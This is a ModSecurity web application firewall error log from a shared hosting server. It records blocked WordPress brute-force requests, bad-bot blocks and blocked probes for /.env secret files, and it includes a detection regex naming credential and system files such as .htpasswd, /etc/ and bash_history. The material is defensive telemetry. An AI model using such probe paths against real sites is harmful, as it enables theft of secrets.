[Tue May 26 16:06:56.871045 2026] [security2:error] [pid 773493:tid 773695] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3yJgy-Vk4jSdqTCQ5RAAAAM0"]
[Tue May 26 16:06:59.026603 2026] [security2:error] [pid 773493:tid 773746] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3ypgy-Vk4jSdqTCQ5hQAAAQA"]
[Tue May 26 16:07:01.100425 2026] [security2:error] [pid 773493:tid 773637] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3zJgy-Vk4jSdqTCQ5uwAAAJM"]
[Tue May 26 16:07:01.404854 2026] [security2:error] [pid 773493:tid 773642] [client 123.22.148.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3zJgy-Vk4jSdqTCQ5zQAAAJg"]
[Tue May 26 16:07:03.144992 2026] [security2:error] [pid 773493:tid 773625] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV3zpgy-Vk4jSdqTCQ59wAAAIc"]
[Tue May 26 16:07:04.177116 2026] [security2:error] [pid 773493:tid 773629] [client 45.3.42.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV30Jgy-Vk4jSdqTCQ6IQAAAIs"], referer: https://www.anujtradingco.com/
[Tue May 26 16:07:04.758530 2026] [security2:error] [pid 773493:tid 773742] [client 106.219.85.83:17754] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV30Jgy-Vk4jSdqTCQ6MQAAAPw"]
[Tue May 26 16:07:04.758641 2026] [security2:error] [pid 773493:tid 773742] [client 106.219.85.83:17754] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV30Jgy-Vk4jSdqTCQ6MQAAAPw"]
[Tue May 26 16:07:05.172688 2026] [security2:error] [pid 773493:tid 773656] [client 45.3.42.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV30Zgy-Vk4jSdqTCQ6PgAAAKY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1478647&moderation-hash=bc4d25e314d2f44b11632829b05106a2
[Tue May 26 16:07:05.214900 2026] [security2:error] [pid 773493:tid 773670] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV30Jgy-Vk4jSdqTCQ6NAAAALQ"]
[Tue May 26 16:07:06.153522 2026] [security2:error] [pid 773493:tid 773685] [client 103.44.52.196:55852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV30pgy-Vk4jSdqTCQ6VwAAAMM"]
[Tue May 26 16:07:06.153740 2026] [security2:error] [pid 773493:tid 773685] [client 103.44.52.196:55852] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV30pgy-Vk4jSdqTCQ6VwAAAMM"]
[Tue May 26 16:07:06.860897 2026] [security2:error] [pid 773493:tid 773723] [client 45.3.42.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV30pgy-Vk4jSdqTCQ6bQAAAOk"], referer: https://anujtradingco.com
[Tue May 26 16:07:07.236912 2026] [security2:error] [pid 773493:tid 773730] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV30pgy-Vk4jSdqTCQ6bAAAAPA"]
[Tue May 26 16:07:09.777982 2026] [security2:error] [pid 773493:tid 773646] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV31Zgy-Vk4jSdqTCQ6ygAAAJw"]
[Tue May 26 16:07:11.037967 2026] [autoindex:error] [pid 773493:tid 773586] [remote 40.160.16.154:27486] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:07:11.331124 2026] [security2:error] [pid 773493:tid 773750] [client 2.57.122.173:26492] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aeromodellingconsultants.glorodavionics.com"] [uri "/secrets/.env"] [unique_id "ahV315gy-Vk4jSdqTCQ7AQAAAQQ"]
[Tue May 26 16:07:11.357020 2026] [security2:error] [pid 773493:tid 773747] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV31pgy-Vk4jSdqTCQ69QAAAQE"]
[Tue May 26 16:07:12.426912 2026] [security2:error] [pid 773493:tid 773559] [remote 217.112.89.35:34926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV32Jgy-Vk4jSdqTCQ7HwAA4UE"]
[Tue May 26 16:07:12.867922 2026] [security2:error] [pid 773493:tid 773705] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV32Jgy-Vk4jSdqTCQ7IgAAANc"]
[Tue May 26 16:07:13.099394 2026] [security2:error] [pid 773493:tid 773726] [client 2.57.122.173:26502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.aeromodellingconsultants.glorodavionics.com"] [uri "/.env"] [unique_id "ahV32Zgy-Vk4jSdqTCQ7MwAAAOw"]
[Tue May 26 16:07:14.429795 2026] [security2:error] [pid 773493:tid 773739] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV32pgy-Vk4jSdqTCQ7YgAAAPk"]
[Tue May 26 16:07:14.430265 2026] [security2:error] [pid 773493:tid 773647] [client 106.222.227.47:3324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV32pgy-Vk4jSdqTCQ7YAAAAJ0"]
[Tue May 26 16:07:15.128405 2026] [security2:error] [pid 773493:tid 773665] [client 103.44.52.196:55930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV325gy-Vk4jSdqTCQ7eQAAAK8"]
[Tue May 26 16:07:15.128544 2026] [security2:error] [pid 773493:tid 773665] [client 103.44.52.196:55930] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV325gy-Vk4jSdqTCQ7eQAAAK8"]
[Tue May 26 16:07:15.326301 2026] [security2:error] [pid 773493:tid 773683] [client 106.219.85.83:9488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV325gy-Vk4jSdqTCQ7gwAAAME"]
[Tue May 26 16:07:15.326575 2026] [security2:error] [pid 773493:tid 773683] [client 106.219.85.83:9488] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV325gy-Vk4jSdqTCQ7gwAAAME"]
[Tue May 26 16:07:15.697003 2026] [security2:error] [pid 773493:tid 773716] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV325gy-Vk4jSdqTCQ7fAAAAOI"]
[Tue May 26 16:07:17.515947 2026] [security2:error] [pid 773493:tid 773721] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV33Zgy-Vk4jSdqTCQ7twAAAOc"]
[Tue May 26 16:07:19.278748 2026] [security2:error] [pid 773493:tid 773687] [client 185.191.171.14:42738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahV335gy-Vk4jSdqTCQ77wAAAMU"]
[Tue May 26 16:07:19.278916 2026] [security2:error] [pid 773493:tid 773687] [client 185.191.171.14:42738] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahV335gy-Vk4jSdqTCQ77wAAAMU"]
[Tue May 26 16:07:19.455957 2026] [security2:error] [pid 773493:tid 773701] [client 173.239.214.65:29987] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "midrivermarina.com"] [uri "/wp-includes/css/buttons.css"] [unique_id "ahV335gy-Vk4jSdqTCQ78AAAANM"]
[Tue May 26 16:07:19.465671 2026] [security2:error] [pid 773493:tid 773741] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV335gy-Vk4jSdqTCQ75AAAAPs"]
[Tue May 26 16:07:19.945245 2026] [security2:error] [pid 773493:tid 773619] [remote 95.216.117.13:58716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahV335gy-Vk4jSdqTCQ8AAAA2H0"]
[Tue May 26 16:07:20.646072 2026] [security2:error] [pid 773493:tid 773676] [client 80.82.70.133:60000] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "thedebateafrica.org"] [uri "/"] [unique_id "ahV34Jgy-Vk4jSdqTCQ8FQAAALo"]
[Tue May 26 16:07:20.646652 2026] [proxy:warn] [pid 773493:tid 773676] [client 80.82.70.133:60000] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /
[Tue May 26 16:07:21.656207 2026] [security2:error] [pid 773493:tid 773729] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV34Zgy-Vk4jSdqTCQ8KQAAAO8"]
[Tue May 26 16:07:23.134509 2026] [security2:error] [pid 773493:tid 773705] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV34pgy-Vk4jSdqTCQ8UgAAANc"]
[Tue May 26 16:07:25.760451 2026] [security2:error] [pid 773493:tid 773678] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV35Zgy-Vk4jSdqTCQ8oQAAALw"]
[Tue May 26 16:07:26.006572 2026] [security2:error] [pid 773493:tid 773668] [client 103.44.52.196:37940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV35pgy-Vk4jSdqTCQ8tQAAALI"]
[Tue May 26 16:07:26.006707 2026] [security2:error] [pid 773493:tid 773668] [client 103.44.52.196:37940] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV35pgy-Vk4jSdqTCQ8tQAAALI"]
[Tue May 26 16:07:26.128005 2026] [security2:error] [pid 773493:tid 773747] [client 106.219.85.83:2462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV35pgy-Vk4jSdqTCQ8tgAAAQE"]
[Tue May 26 16:07:26.128164 2026] [security2:error] [pid 773493:tid 773747] [client 106.219.85.83:2462] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV35pgy-Vk4jSdqTCQ8tgAAAQE"]
[Tue May 26 16:07:27.834254 2026] [security2:error] [pid 773493:tid 773625] [client 152.44.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV355gy-Vk4jSdqTCQ86gAAAIc"], referer: https://www.anujtradingco.com/
[Tue May 26 16:07:28.030317 2026] [security2:error] [pid 773493:tid 773644] [client 23.158.233.122:55380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV355gy-Vk4jSdqTCQ86wAAAJo"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 16:07:28.030478 2026] [security2:error] [pid 773493:tid 773644] [client 23.158.233.122:55380] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV355gy-Vk4jSdqTCQ86wAAAJo"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 16:07:28.185703 2026] [security2:error] [pid 773493:tid 773654] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV355gy-Vk4jSdqTCQ86QAAAKQ"]
[Tue May 26 16:07:28.461887 2026] [security2:error] [pid 773493:tid 773739] [client 23.158.233.122:55404] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV36Jgy-Vk4jSdqTCQ8-gAAAPk"], referer: https://www.cagmedya.com/adana-web-tasarim/
[Tue May 26 16:07:29.464333 2026] [security2:error] [pid 773493:tid 773650] [client 152.44.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV36Zgy-Vk4jSdqTCQ9HwAAAKA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1219367&moderation-hash=e1ace62890108a8964350a02de014665
[Tue May 26 16:07:29.549730 2026] [security2:error] [pid 773493:tid 773625] [client 106.222.227.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV36Zgy-Vk4jSdqTCQ9KAAAAIc"]
[Tue May 26 16:07:29.550267 2026] [security2:error] [pid 773493:tid 773718] [client 106.222.227.47:22231] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahV36Zgy-Vk4jSdqTCQ9JgAAAOQ"]
[Tue May 26 16:07:29.573412 2026] [security2:error] [pid 773493:tid 773548] [remote 211.23.68.235:9168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV36Zgy-Vk4jSdqTCQ9HgAA9jY"]
[Tue May 26 16:07:29.914013 2026] [security2:error] [pid 773493:tid 773662] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV36Zgy-Vk4jSdqTCQ9IgAAAKw"]
[Tue May 26 16:07:31.052084 2026] [security2:error] [pid 773493:tid 773592] [remote 35.233.46.64:53373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.46.233.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahV36pgy-Vk4jSdqTCQ9VwAAtWI"]
[Tue May 26 16:07:31.375438 2026] [security2:error] [pid 773493:tid 773696] [client 62.60.130.233:52721] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rsmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV365gy-Vk4jSdqTCQ9YwAAAM4"], referer: https://twitter.com/
[Tue May 26 16:07:31.698711 2026] [security2:error] [pid 773493:tid 773652] [client 81.56.233.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV365gy-Vk4jSdqTCQ9ZQAAAKI"]
[Tue May 26 16:07:31.709656 2026] [security2:error] [pid 773493:tid 773666] [client 62.60.130.233:61010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.rsmsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV365gy-Vk4jSdqTCQ9dAAAALA"], referer: https://duckduckgo.com/
[Tue May 26 16:07:31.710870 2026] [security2:error] [pid 773493:tid 773635] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV365gy-Vk4jSdqTCQ9aAAAAJE"]
[Tue May 26 16:07:33.929087 2026] [security2:error] [pid 773493:tid 773714] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV37Zgy-Vk4jSdqTCQ9nQAAAOA"]
[Tue May 26 16:07:34.036899 2026] [security2:error] [pid 773493:tid 773644] [client 62.60.130.233:51500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-login.php"] [unique_id "ahV37pgy-Vk4jSdqTCQ9pAAAAJo"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 16:07:34.366367 2026] [security2:error] [pid 773493:tid 773624] [client 62.60.130.233:61897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-login.php"] [unique_id "ahV37pgy-Vk4jSdqTCQ9rQAAAIY"]
[Tue May 26 16:07:36.033170 2026] [security2:error] [pid 773493:tid 773660] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV375gy-Vk4jSdqTCQ9yAAAAKo"]
[Tue May 26 16:07:36.641414 2026] [security2:error] [pid 773493:tid 773692] [client 106.219.85.83:17703] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV38Jgy-Vk4jSdqTCQ93QAAAMo"]
[Tue May 26 16:07:36.641515 2026] [security2:error] [pid 773493:tid 773692] [client 106.219.85.83:17703] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV38Jgy-Vk4jSdqTCQ93QAAAMo"]
